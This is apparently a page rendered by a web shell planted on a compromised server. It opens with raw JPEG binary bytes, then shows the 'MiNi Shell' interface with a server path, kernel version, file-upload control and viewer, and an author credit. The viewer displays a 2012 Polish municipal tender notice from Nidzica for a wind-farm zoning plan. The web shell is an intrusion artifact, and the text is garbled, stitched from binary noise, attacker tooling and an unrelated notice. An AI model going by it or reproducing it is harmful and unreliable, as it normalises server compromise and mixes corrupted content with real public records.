JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/25669-N-2012.html

<p class="kh_header"><b>Nidzica: Sporządzenie miejscowego planu zagospodarowania przestrzennego części obrębu geodezyjnego Frąknowo</b><br>
<b>Numer ogłoszenia: 25669 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nidzica , Plac Wolności 1, 13-100 Nidzica, woj. warmińsko-mazurskie, tel. 089 625 07 10, faks 089 625 07 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.warmia.mazury.pl/nidzica_gmina_miejsko_-_wiejska/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego części obrębu geodezyjnego Frąknowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sporządzenie  planu zagospodarowania  przestrzennego części obrębu Frąknowo o powierzchni  około 715 ha z przeznaczeniem pod lokalizację farmy elektrowni wiatrowych zwanego  dalej Planem  w oparciu o  uchwałą NR XIII/227/2011 Rady Miejskiej w Nidzicy z dnia 24.11.2011r.  w sprawie przystąpienia  do sporządzenia miejscowego planu zagospodarowania przestrzennego części obrębu geodezyjnego Frąknowo.
Opracowanie  winno uwzględniać  wymagania  wynikające  z :
a)ustawy  z  dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. 2003 .80.717 ,ze zmianami),
b)rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia  2003r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz.U.2003.164.1587) ,
c)ustawy  z dnia 03.10.2008r. o udostępnieniu informacji o środowisku i jego ochronie udziale społeczeństwa w  ochronie  środowiska oraz ocenach oddziaływania na środowisko(Dz.U. 2008r. Nr 199,poz.1227 z późn. zm.)
d)innych obowiązujących przepisów  prawa dotyczących przedmiotu zamówienia
2.Opracowanie  ekofizjograficzne na potrzeby  planu zagospodarowania  przestrzennego części obrębu Frąknowo zgodnie z rozporządzeniem Ministra Środowiska  z dnia 09 września 2002r. w sprawie opracowań ekofizjograficznych (Dz. U. Nr  155,poz. 1298  z 2002r).
3.Do obowiązków  Wykonawcy należy na swój koszt pozyskanie we własnym zakresie innych  potrzebnych  materiałów do opracowania zamówienia. Materiały geodezyjne  do opracowania planu przyjęte do państwowego zasobu  geodezyjno-kartograficznego dostarcza Zamawiający. 
4. Szczegółowy zakres zamówienia , o którym mowa w ust. 1 obejmuje:
a)przygotowanie wymaganych przepisami wzorów wszystkich zawiadomień, ogłoszeń, obwieszczeń, wykazów , zestawień, wystąpień, uchwał niezbędnych do czynności określonych w art. 11 ustawy  o planowaniu i zagospodarowaniu przestrzennym,
b) inwentaryzację urbanistyczną - prace terenowe(wizję terenową zainwestowania  i uzbrojenia terenu oraz elementów  przyrodniczych),
c) sporządzenie opracowania ekofizjograficznego-dokument obejmujący tekst oraz rysunki w postaci kolorowego wydruku ,
d) rozpatrzenie  wniosków w sprawie  planu złożonych wcześniej  oraz analiza wniosków  o których mowa w art. 17 ust. 1  ustawy o planowaniu i zagospodarowaniu przestrzennym wraz z przedstawieniem  Zamawiającemu w formie  pisemnej stanowiska o sposobie  ich rozpatrzenia,
e) opracowanie projektu planu obejmującego tekst oraz rysunki planu w postaci kolorowego wydruku i prezentacja przez wykonawcę w siedzibie Zamawiającego,
f) uzyskanie  akceptacji Zamawiającego dla przyjętych rozwiązań przed przystąpieniem do dalszych prac planistycznych-prezentacja projektu planu na posiedzeniu komisji architektoniczno-urbanistycznej-uzyskanie pozytywnej opinii,
g) sporządzenie projektu planu  w formie  tekstowej oraz w formie graficznej, rysunki planu w ilość egzemplarzy w formie tekstowej / cyfrowej niezbędna do dokonania uzgodnień i opinii wymaganych przepisami prawa,
h)opracowanie prognozy oddziaływania na środowisko,(planu) spełniającej wymagania aktualnie obowiązujących przepisów w tym zakresie,
i) uzyskanie wymaganych przepisami prawa uzgodnień i opinii wraz z przygotowaniem projektów pism do instytucji i organów  opiniujących i uzgadniających projekt studium wraz prognozą oddziaływania na środowisko,
j)analiza otrzymanych opinii i uzgodnień wraz z przygotowaniem wykazu opinii i uzgodnień oraz  wprowadzenie zmian wynikających z uzyskanych opinii i uzgodnień, ewentualne wdrożenie   procedury opiniowania i uzgadniania,
k) sporządzenie projektu planu do publicznego wglądu-przygotowanie projektów pism związanych z wyłożeniem,
l) uczestnictwo i udzielanie niezbędnych wyjaśnień w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami oraz sporządzenie protokołu z tej dyskusji,
ł) analiza złożonych uwag do wyłożonego projektu planu, sporządzenie wykazu uwag wniesionych do projektu planu wraz z pisemnym stanowiskiem dotyczącym ich uwzględnienia  lub nieuwzględnienia,
m) wprowadzenie zmian do projektu planu wynikających  z uwzględnienia  wniesionych uwag, a następnie   w niezbędnym zakresie  ponowienie uzgodnień,
n) przedłożenie  i prezentacja Radzie Miejskiej  projektu planu po zmianach wynikających z uwzględnionych uwag-projekt uchwały wraz z załącznikami,
o) przygotowanie do przedstawienia Wojewodzie  uchwały o uchwaleniu planu wraz z załącznikami oraz dokumentacją prac planistycznych,
p) udział w czynnościach niezbędnych do ewentualnego doprowadzenia planu do zgodności z przepisami prawa, w sytuacji stwierdzenia nieważności  lub uchylenia uchwały przez Wojewodę.
5. Wszelkie prace projektowe lub czynności nie opisane powyżej, a wynikające z procedur  określonych w ustawie oraz przepisach szczegółowych, niezbędne do właściwego i kompletnego opracowania zamówienia Wykonawca winien wykonać w ramach przedmiotu zamówienia i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia .
6. Wykonawca zobowiązuje się do zwrotu  pobranych materiałów niezwłocznie  po ich wykorzystaniu.
7. Wykonawca  zobowiązuje się  do niewykorzystania udostępnionych materiałów do celów innych  niż opracowanie planu.
8. Zamówienie obejmuje  wykonanie i dostarczenie  Zamawiającemu do jego siedziby, to jest Urzędu Miejskiego w Nidzicy, przedmiotu zamówienia  w następujących formach:
8.1. Miejscowy Plan Zagospodarowania Przestrzennego
a) po 3 egz. rysunku planu  technice barwnej w skali  1:2 000 w tym  1 egz. w technice barwnej  zafoliowanym i oprawionym w listwy do zawieszenia i przenoszenia
b) 3 egz. części tekstowej,
c) część tekstowa i graficzna  w wersji elektronicznej(2 płyt CD)-część tekstowa  planu w formacie WORD, część graficzna planu na nośnikach elektronicznych  w formacie umożliwiającym  odczyt i wydruk - pdf lub innej po uzgodnieniu z Zamawiającym.
8.2. Opracowanie ekofizjograficzne:
a) 2 egz. ekofizjografii w formie papierowej i jeden elektronicznej(1 płyta CD)
8.3. Prognoza oddziaływania na środowisko
a) 2 egz. prognozy oddziaływania na środowisko w formie papierowej i jeden elektronicznej(1 płyta CD)
b) rysunki, mapy w wersji kolorowej.
8.4. Dokumentacja planistyczna:
a) komplet dokumentacji prac planistycznych wykonanej w 1 egzemplarzu-oryginał.
9.Treść projektu uchwały wraz z załącznikami należy wykonać zgodnie z wymaganiami określonymi w Rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 27 grudnia 2011r. w sprawie wymagań technicznych dokumentów elektronicznych zawierających akty normatywne i inne akty prawne, elektronicznej formy dzienników urzędowych oraz środków komunikacji elektronicznej i informatycznych  nośników danych (Dz.U. z 2011r. Nr 289,poz. 1699) celem publikacji w Dzienniku Urzędowym.
10. Za dzień wykonania zamówienia uznaje się dzień dostarczenia Zamawiającemu  kompletu dokumentów, o których mowa w umowie, po stwierdzeniu przez Wojewodę zgodności uchwalonego planu z prawem
Szczegółowe warunki wykonania zamówienia określa projekt umowy stanowiący załącznik nr 1 do SIWZ wraz z harmonogramem rzeczowo - finansowym stanowiącym załącznik nr 1 do projektu umowy.

Wielkość zamówienia: przetarg nieograniczony o wartości szacunkowej < od kwot określonych w przepisach wydanych na podstawie art. 11 ust. 8 Prawa zamówień publicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty oświadczenia stanowiącego załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 2 usługi polegające na opracowaniu projektów miejscowego planu zagospodarowania przestrzennego terenu, obejmującego obszar min. 200 ha każdy.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów (załącznik nr 5 do SIWZ wraz z dokumentami potwierdzającymi należyte wykonanie wskazanych usług). Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów lub złożenia wyjaśnień dotyczących tych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty oświadczenia stanowiącego załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje minimum jedną osobą posiadającą uprawnienia urbanistyczne pełniącą rolę głównego projektanta i odpowiedzialną za realizację zamówienia. 
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów (załącznik nr 6 do SIWZ) i oświadczenia (załącznik nr 7 do SIWZ). Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów lub złożenia wyjaśnień dotyczących tych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty oświadczenia stanowiącego załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie  prawo zmiany treści umowy. Zmiany te mogą dotyczyć:
1. Zmiany terminu.
1.1 Zmiany właściwych  przepisów szczegółowych w trakcie wykonywania przedmiotu umowy. Warunkiem dokonania zmian jest pisemny wniosek Wykonawcy o przedłużenie terminu realizacji umowy zawierający co najmniej potwierdzenie faktu zmiany właściwych przepisów i wykazanie że zmiana przepisów wymaga dodatkowego czasu na dostosowanie projektu planu do zmienionych  przepisów.
1.2. Realizacja przedmiotu umowy wymaga uzyskania stosownych uzgodnień i opinii z właściwych  organów. Z przyczyn niezależnych od stron niemożliwe było uzyskanie uzgodnień i opinii jw. w terminach przewidzianych w przepisach prawa. Warunkiem dokonania zmiany jest pisemny wniosek Wykonawcy o przedłużenie terminu realizacji umowy, udokumentowany zasadnością dokonania zmiany poprzez przedstawienie dokumentów potwierdzających opóźnienie  w wydaniu uzgodnień  lub opinii przez właściwe organy.
1.3 Zaistnienie  konieczności powtórzenia  procedury opiniowania i uzgadniania w wyniku  wprowadzonych  zmian na podstawie otrzymanych opinii i uzgodnień. Warunkiem dokonania zmiany pisemny  wniosek Wykonawcy o przedłużenie terminu realizacji umowy, udokumentowany zasadnością dokonania zmiany, poprzez przedstawienie dokumentów potwierdzających opóźnienie w wyniku wprowadzonych zmian na podstawie otrzymanych opinii  i uzgodnień.
1.4. Zaistnieje konieczność powtórzenia procedury w niezbędnym zakresie w wyniku wprowadzonych
zmian wynikających z uwzględnienia  złożonych   uwag do projektu planu. Warunkiem dokonania zmiany jest pisemny wniosek Wykonawcy o przedłużenie terminu realizacji umowy, udokumentowany   
zasadnością dokonania zmiany, poprzez przedstawienie dokumentów potwierdzających opóźnienie w wyniku wprowadzonych zmian wynikających z uwzględnienia złożonych uwag do projektu planu.
2. Zmiany osobowe
2.1  Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące
się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie o planowaniu i zagospodarowaniu przestrzennym lub innych ustawach,
2.2. Zmiana osób przy pomocy, których Wykonawca realizuje  przedmiot umowy, a od których wymagano określonego doświadczenia lub wykształcenia  na inne legitymujące się doświadczeniem lub wykształceniem spełniającym wymóg SIWZ.
3.Zmiany organizacji spełnienia świadczenia
3.1 Zmiana  harmonogramu wykonania usług bez zmiany ostatecznego terminu spełnienia świadczenia lub zmiana innych ustaleń dotyczących terminów  spełnienia świadczenia  w ramach umowy.
3.2. Zmiana zasad dokonywania odbioru usługi, jeżeli nie spowoduje  zwiększenia kosztów dokonania odbioru, które obciążałyby Zamawiającego.
3.3. Zmiana treści dokumentów przedstawionych wzajemnie przez strony w trakcie realizacji umowy lub sposobu informowania o realizacji umowy. Zmiana ta nie może spowodować braku informacji       niezbędnych Zamawiającemu do prawidłowej realizacji umowy.
4. Płatności
4.1. Zmiany terminów płatności wynikających z wszelkich zmian wprowadzonych  do umowy.
4.2. Zmiana sposobu rozliczenia  umowy  lub dokonywania płatności częściowych na rzecz Wykonawcy.
5. Zmiany podwykonawców
5.1. Zmiana podwykonawców, przy pomocy których Wykonawca realizuje przedmiot umowy po uprzedniej akceptacji przez Zamawiającego
6. Pozostałe zmiany
6.1 Siła wyższa uniemożliwiająca wykonanie  przedmiotu umowy zgodnie ze SIWZ.
6.2. Rezygnacja  przez Zamawiającego z realizacji przedmiotu umowy. 
W takim przypadku wynagrodzenie przysługujące  Wykonawcy zostanie  pomniejszone , przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które  Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 
6.3 Zmiany wynagrodzenia  Wykonawcy o kwotę wynikającą ze zmienionych stawek podatku VAT    obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy.
7.Wszelkie zmiany umowy  wymagają formy pisemnej pod rygorem nieważności.
8. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych, a w szczególności:
8.1. Ograniczenie przedmiotu świadczenia, jeżeli taką możliwość przewidywała umowa
8.2 Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy( np.: zmiana        rachunku bankowego)
8.3. Zmiana danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/nidzica_gmina_miejsko_-_wiejska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nidzicy, Plac Wolności 1, 13-100 Nidzica (pokój nr 3) w godz. 7:30-15:30 lub po złożeniu pisemnego wniosku: pisemnie, faxem lub drogą elektroniczną na e-mail: halina@nidzica.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2012 godzina 11:00, miejsce: oferty należy składać w sekretariacie (pokój nr 19) Urzędu Miejskiego w Nidzicy, Plac Wolności 1, 13-100 Nidzica..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej. Otwarcie ofert nastąpi w dniu 09.02.2012 r. o godz. 11:15 w pokoju nr 5 Urzędu Miejskiego w Nidzicy. Zamawiający wydaje SIWZ nieodpłatnie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com